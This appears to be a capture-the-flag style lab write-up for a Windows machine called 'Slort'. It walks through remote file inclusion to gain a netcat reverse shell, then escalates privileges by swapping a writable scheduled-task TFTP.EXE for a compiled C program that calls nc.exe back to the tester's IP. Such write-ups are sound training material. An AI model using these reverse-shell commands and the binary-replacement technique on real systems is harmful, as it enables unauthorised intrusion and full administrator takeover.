Machine Information
- Machine Name: Slort
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Nmap scan report for 192.168.221.53
Host is up, received user-set (0.018s latency).
Scanned at 2024-10-08 20:16:08 +08 for 569s
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql? syn-ack ttl 125
| fingerprint-strings:
| LSCP, NULL:
|_ Host '192.168.251.221' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.251.221' is not allowed to connect to this MariaDB server
4443/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.221.53:4443/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.221.53:8080/dashboard/
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Let’s just start with port 8080 ~
Port 8080
Let’s just go through the website and see what’s available.
After looking around, there’s no interesting stuff but the results from brute forcing directory contains some useful information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.221.53:8080/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.221.53:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
...
site [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 18ms]
...
I noticed this site directory which seems to be suspicious.
After exploring the site directory, I noticed that the URL is ?page=main.php which might be vulnerable to both LFI and RFI.
I tried random LFI but it seems like there’s a include_path. Since I have no other idea, I decided to look into RFI first. To make sure RFI works, the setting allow_url_include must be on. There’s a phpinfo page that I could look into from dashboard.
Alright, It seems like allow_url_include is on. This means that there’s a high chance that I could perform RFI. Time to set up a simple HTTP server using python and test if it works.
Yes, it works and I could perform RCE. Time to get reverse shell from here. I just upload a nc.exe and execute it to get reverse shell.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.164] from (UNKNOWN) [192.168.221.53] 50203
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site>whoami
whoami
slort\rupert
Time to privilege escalation to get high privilege user.
Privilege Escalation
Always try to run winpeas to avoid missing out useful information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6E11-8C59
Directory of C:\
07/20/2020 07:08 AM <DIR> Backup
10/08/2024 05:54 AM 2,693 output.txt
12/07/2019 02:14 AM <DIR> PerfLogs
05/04/2022 01:06 AM <DIR> Program Files
12/03/2021 09:22 AM <DIR> Program Files (x86)
12/03/2021 09:29 AM <DIR> Users
05/04/2022 01:52 AM <DIR> Windows
06/12/2020 08:11 AM <DIR> xampp
1 File(s) 2,693 bytes
7 Dir(s) 28,588,576,768 bytes free
Here’s a suspicious Backup directory in C:\. I look inside and explore each file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\Backup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6E11-8C59
Directory of C:\Backup
07/20/2020 07:08 AM <DIR> .
07/20/2020 07:08 AM <DIR> ..
06/12/2020 07:45 AM 11,304 backup.txt
06/12/2020 07:45 AM 73 info.txt
06/23/2020 07:49 PM 73,802 TFTP.EXE
3 File(s) 85,179 bytes
2 Dir(s) 28,588,474,368 bytes free
C:\Backup>type info.txt
type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
It seems like I found a scheduled task where it will run the TFTP.EXE every 4 minutes. Now let’s see if I could modify the file.
1
2
3
4
5
6
7
8
C:\Backup>icacls TFTP.EXE
icacls TFTP.EXE
TFTP.EXE BUILTIN\Users:(I)(F)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
Based on the result, I could modify the the file. Time to create a malicious exe file and replace it.
1
2
3
4
5
6
7
8
9
10
#include <stdlib.h>
int main ()
{
int i;
i = system ("C:\\xampp\\htdocs\\site\\nc.exe 192.168.45.164 1235 -e cmd");
return 0;
}
Basically, I use this C code to get reverse shell. I just compile it in linux and upload to the victim machine and replace the TFTP.EXE
1
x86_64-w64-mingw32-gcc a.c -o test.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\Backup>curl 192.168.45.164:8000/test.exe -O
curl 192.168.45.164:8000/test.exe -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 110k 100 110k 0 0 110k 0 0:00:01 --:--:-- 0:00:01 1177k
C:\Backup>move TFTP.EXE TFTP.EXE.BAK
move TFTP.EXE TFTP.EXE.BAK
1 file(s) moved.
C:\Backup>move test.exe TFTP.EXE
move test.exe TFTP.EXE
1 file(s) moved.
After everything is prepared, now just get the netcat listener ready.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.164] from (UNKNOWN) [192.168.221.53] 50356
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
slort\administrator
That’s how I get administrator shell ~
Things I learned from this machine
- make sure to check phpinfo for useful information, especially RFI
- Always look into unusual directories when it comes to privilege escalation